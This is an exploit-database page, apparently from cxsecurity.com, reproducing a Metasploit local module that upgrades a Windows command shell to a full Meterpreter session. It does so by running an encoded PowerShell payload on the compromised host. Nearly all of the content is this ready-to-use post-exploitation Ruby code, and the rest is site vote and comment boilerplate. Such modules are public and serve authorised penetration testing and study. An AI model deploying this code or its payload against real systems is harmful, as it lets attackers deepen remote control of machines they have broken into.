Windows Command Shell Upgrade (Powershell)

2014.02.11
Credit: Ben Campbell
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/exploit/powershell' class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Exploit::Powershell include Post::File def initialize(info={}) super( update_info( info, 'Name' => 'Windows Command Shell Upgrade (Powershell)', 'Description' => %q{ This module executes Powershell to upgrade a Windows Shell session to a full Meterpreter session. }, 'License' => MSF_LICENSE, 'Author' => [ 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' ], 'DefaultOptions' => { 'WfsDelay' => 10, }, 'DisclosureDate' => 'Jan 01 1999', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'shell' ], 'Targets' => [ [ 'Universal', {} ] ], 'DefaultTarget' => 0 )) end def exploit psh_path = "\\WindowsPowerShell\\v1.0\\powershell.exe" if file? "%WINDIR%\\System32#{psh_path}" print_status("Executing powershell command line...") cmd_exec(cmd_psh_payload(payload.encoded)) else fail_with(Exploit::Failure::NotVulnerable, "No powershell available.") end end end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top